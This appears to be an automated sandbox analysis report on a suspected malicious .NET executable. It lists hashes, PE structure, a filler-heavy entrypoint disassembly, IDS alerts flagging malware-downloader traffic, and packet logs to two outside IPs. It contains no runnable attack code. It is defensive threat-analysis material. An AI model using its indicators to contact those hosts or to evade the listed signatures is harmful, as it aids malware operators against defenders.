TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.793712824949678
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	File.com.exe
File size:	2'387'968 bytes
MD5:	8b4e3a62d01f4d0cf638607b5e7fb2a1
SHA1:	7af22d0699c5d98422672b502e3bdfec4d67ce96
SHA256:	4187407e94e390b8916206e2714b4941cacd06c60f9a8662f41b847cab5f2d5f
SHA512:	d0d7279583395eeb463e80e5ad065d95898198d6901e7ae922b939e11276c9a86bd2c3aee67f62675e524509e56079c8a9628056a56054ddfb3a7211c3294d30
SSDEEP:	49152:64ryFkp8Y4N1Pq3FKHv6T0x5E/aHJEt05iR:6qrpddVBTv
TLSH:	89B5231A6BD26819C6AC48F8C1B235644374D66B30C7F7AB45CDA4F0AFE258BFA43453
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..W.................Z$..........w$.. ....$...@.. ........................$...........`................................

File Icon


Icon Hash:	9b1a7a82aca38fc6

Static PE Info

General

Entrypoint:	0x6477fe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5787A338 [Thu Jul 14 14:35:36 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2477a8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x248000	0x119c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x245804	0x245a00	5b9dcea6259e148551c329b27431ef22	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x248000	0x119c	0x1200	3288cc9fc17459a6499013267c330f44	False	0.8146701388888888	data	7.187563066845134	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x24a000	0xc	0x200	2cb35c5504d386602c3190198ac1aab6	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2480e8	0xd7f	PNG image data, 189 x 189, 8-bit/color RGBA, non-interlaced			0.9357452966714906
RT_GROUP_ICON	0x248e68	0x14	data			1.15
RT_VERSION	0x248e7c	0x320	data	English	United States	0.48875

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-18T21:25:33.610271+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49744	443	192.168.2.4	188.114.96.3
2024-08-18T21:25:45.404634+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49759	443	192.168.2.4	188.114.97.3
2024-08-18T21:25:51.015957+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49768	443	192.168.2.4	188.114.97.3
2024-08-18T21:25:37.507892+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49748	443	192.168.2.4	188.114.96.3
2024-08-18T21:25:44.842144+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49752	80	192.168.2.4	132.226.8.169
2024-08-18T21:25:46.914683+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49763	443	192.168.2.4	188.114.97.3
2024-08-18T21:25:43.607796+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49752	80	192.168.2.4	132.226.8.169
2024-08-18T21:25:46.263935+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49761	80	192.168.2.4	132.226.8.169
2024-08-18T21:25:34.467074+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49745	80	192.168.2.4	132.226.8.169
2024-08-18T21:25:33.045166+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49742	80	192.168.2.4	132.226.8.169
2024-08-18T21:25:29.935791+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49742	80	192.168.2.4	132.226.8.169
2024-08-18T21:25:35.046058+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49746	443	192.168.2.4	188.114.96.3
2024-08-18T21:25:46.902548+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49762	443	192.168.2.4	188.114.97.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 18, 2024 21:25:26.173170090 CEST	49742	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:26.178348064 CEST	80	49742	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:26.178430080 CEST	49742	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:26.178618908 CEST	49742	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:26.183665991 CEST	80	49742	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:29.629023075 CEST	80	49742	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:29.632811069 CEST	49742	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:29.637742043 CEST	80	49742	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:29.894542933 CEST	80	49742	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:29.935791016 CEST	49742	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:29.945092916 CEST	49743	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:29.945152044 CEST	443	49743	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:29.945235014 CEST	49743	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:29.951999903 CEST	49743	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:29.952028990 CEST	443	49743	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:30.450468063 CEST	443	49743	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:30.450555086 CEST	49743	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:30.454277039 CEST	49743	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:30.454288006 CEST	443	49743	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:30.454739094 CEST	443	49743	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:30.505671024 CEST	49743	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:30.548512936 CEST	443	49743	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:30.619450092 CEST	443	49743	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:30.619745970 CEST	443	49743	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:30.619848967 CEST	49743	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:30.625715017 CEST	49743	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:30.634960890 CEST	49742	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:30.639849901 CEST	80	49742	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:32.990401983 CEST	80	49742	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:32.992223978 CEST	49744	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:32.992271900 CEST	443	49744	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:32.992338896 CEST	49744	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:32.992573977 CEST	49744	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:32.992583990 CEST	443	49744	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:33.045166016 CEST	49742	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:33.460905075 CEST	443	49744	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:33.462366104 CEST	49744	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:33.462390900 CEST	443	49744	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:33.610168934 CEST	443	49744	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:33.610394955 CEST	443	49744	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:33.610470057 CEST	49744	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:33.610883951 CEST	49744	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:33.614057064 CEST	49742	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:33.615082979 CEST	49745	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:33.619204998 CEST	80	49742	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:33.619287968 CEST	49742	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:33.619947910 CEST	80	49745	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:33.620012999 CEST	49745	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:33.620098114 CEST	49745	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:33.625240088 CEST	80	49745	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:34.423590899 CEST	80	49745	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:34.425146103 CEST	49746	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:34.425241947 CEST	443	49746	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:34.425319910 CEST	49746	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:34.425903082 CEST	49746	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:34.425946951 CEST	443	49746	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:34.467073917 CEST	49745	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:34.896380901 CEST	443	49746	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:34.897944927 CEST	49746	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:34.897998095 CEST	443	49746	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:35.046049118 CEST	443	49746	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:35.046149969 CEST	443	49746	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:35.046211004 CEST	49746	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:35.046483040 CEST	49746	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:35.050297022 CEST	49747	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:35.055181980 CEST	80	49747	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:35.055262089 CEST	49747	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:35.055329084 CEST	49747	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:35.060188055 CEST	80	49747	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:36.905236959 CEST	80	49747	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:36.906759024 CEST	49748	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:36.906852007 CEST	443	49748	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:36.906956911 CEST	49748	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:36.907387018 CEST	49748	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:36.907421112 CEST	443	49748	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:36.951430082 CEST	49747	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:37.376023054 CEST	443	49748	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:37.377499104 CEST	49748	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:37.377553940 CEST	443	49748	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:37.507960081 CEST	443	49748	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:37.508183002 CEST	443	49748	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:37.508263111 CEST	49748	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:37.508522034 CEST	49748	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:37.511861086 CEST	49747	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:37.513083935 CEST	49749	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:37.516988993 CEST	80	49747	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:37.517061949 CEST	49747	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:37.517967939 CEST	80	49749	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:37.518040895 CEST	49749	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:37.518127918 CEST	49749	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:37.522910118 CEST	80	49749	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:38.952339888 CEST	80	49749	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:38.953543901 CEST	49750	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:38.953592062 CEST	443	49750	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:38.953685999 CEST	49750	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:38.953958035 CEST	49750	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:38.953973055 CEST	443	49750	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:38.998400927 CEST	49749	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:39.424715042 CEST	443	49750	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:39.426316977 CEST	49750	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:39.426343918 CEST	443	49750	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:39.553881884 CEST	443	49750	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:39.554131031 CEST	443	49750	188.114.96.3	192.168.2.4
Aug 18, 2024 21:25:39.554213047 CEST	49750	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:39.554476023 CEST	49750	443	192.168.2.4	188.114.96.3
Aug 18, 2024 21:25:39.562777042 CEST	49749	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:39.568031073 CEST	80	49749	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:39.568238020 CEST	49749	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:39.568479061 CEST	49751	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:39.573307037 CEST	80	49751	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:39.573374033 CEST	49751	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:39.573591948 CEST	49751	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:39.578370094 CEST	80	49751	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:40.669429064 CEST	49752	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:40.674403906 CEST	80	49752	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:40.674484015 CEST	49752	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:40.675791979 CEST	49752	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:40.680624008 CEST	80	49752	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:41.440228939 CEST	80	49751	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:41.450865030 CEST	49753	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:41.450906992 CEST	443	49753	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:41.451054096 CEST	49753	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:41.451308966 CEST	49753	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:41.451322079 CEST	443	49753	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:41.482681036 CEST	49751	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:41.940450907 CEST	443	49753	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:41.942337036 CEST	49753	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:41.942359924 CEST	443	49753	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:42.079619884 CEST	443	49753	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:42.079835892 CEST	443	49753	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:42.079912901 CEST	49753	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:42.080440998 CEST	49753	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:42.100696087 CEST	49751	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:42.101953983 CEST	49754	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:42.105722904 CEST	80	49751	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:42.106717110 CEST	80	49754	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:42.106782913 CEST	49751	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:42.106868982 CEST	49754	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:42.106892109 CEST	49754	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:42.111655951 CEST	80	49754	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:42.299026966 CEST	80	49752	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:42.302038908 CEST	49752	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:42.306898117 CEST	80	49752	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:42.900427103 CEST	80	49754	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:42.901782990 CEST	49755	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:42.901833057 CEST	443	49755	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:42.901896000 CEST	49755	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:42.902199984 CEST	49755	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:42.902214050 CEST	443	49755	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:42.951441050 CEST	49754	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:43.393956900 CEST	443	49755	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:43.399821043 CEST	49755	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:43.399856091 CEST	443	49755	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:43.545989990 CEST	443	49755	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:43.546217918 CEST	443	49755	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:43.546298027 CEST	49755	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:43.546716928 CEST	49755	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:43.549513102 CEST	49754	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:43.550529003 CEST	49756	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:43.555022001 CEST	80	49754	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:43.555104971 CEST	49754	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:43.555386066 CEST	80	49756	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:43.555475950 CEST	49756	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:43.555547953 CEST	49756	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:43.559058905 CEST	80	49752	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:43.560452938 CEST	80	49756	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:43.590747118 CEST	49757	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:43.590776920 CEST	443	49757	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:43.590845108 CEST	49757	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:43.593974113 CEST	49757	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:43.593987942 CEST	443	49757	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:43.607795954 CEST	49752	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:44.149631977 CEST	443	49757	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.149748087 CEST	49757	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.151114941 CEST	49757	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.151124954 CEST	443	49757	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.152256966 CEST	443	49757	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.192538023 CEST	49757	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.236505032 CEST	443	49757	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.306335926 CEST	443	49757	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.306557894 CEST	443	49757	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.306612968 CEST	49757	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.308825016 CEST	49757	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.311788082 CEST	49752	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:44.316641092 CEST	80	49752	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:44.610726118 CEST	80	49756	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:44.611927032 CEST	49758	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.611973047 CEST	443	49758	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.612051964 CEST	49758	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.612323999 CEST	49758	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.612337112 CEST	443	49758	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.654544115 CEST	49756	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:44.798716068 CEST	80	49752	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:44.800535917 CEST	49759	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.800573111 CEST	443	49759	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.800640106 CEST	49759	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.800851107 CEST	49759	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:44.800864935 CEST	443	49759	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:44.842144012 CEST	49752	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.111373901 CEST	443	49758	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:45.112932920 CEST	49758	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:45.112963915 CEST	443	49758	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:45.256938934 CEST	443	49759	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:45.258649111 CEST	49759	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:45.258677959 CEST	443	49759	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:45.263772011 CEST	443	49758	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:45.264014959 CEST	443	49758	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:45.264096022 CEST	49758	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:45.264343023 CEST	49758	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:45.267170906 CEST	49756	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.268131018 CEST	49760	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.272631884 CEST	80	49756	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:45.272699118 CEST	49756	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.272974014 CEST	80	49760	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:45.273040056 CEST	49760	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.273150921 CEST	49760	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.277947903 CEST	80	49760	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:45.404609919 CEST	443	49759	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:45.404664040 CEST	443	49759	188.114.97.3	192.168.2.4
Aug 18, 2024 21:25:45.404706955 CEST	49759	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:45.405010939 CEST	49759	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:45.407327890 CEST	49752	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.408241987 CEST	49761	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.412473917 CEST	80	49752	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:45.412533998 CEST	49752	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.413064957 CEST	80	49761	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:45.413130045 CEST	49761	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.413191080 CEST	49761	80	192.168.2.4	132.226.8.169
Aug 18, 2024 21:25:45.417968988 CEST	80	49761	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:46.059539080 CEST	80	49760	132.226.8.169	192.168.2.4
Aug 18, 2024 21:25:46.066466093 CEST	49762	443	192.168.2.4	188.114.97.3
Aug 18, 2024 21:25:46.066495895 CEST	443	49762	188.114.97.3	192.168.2.4
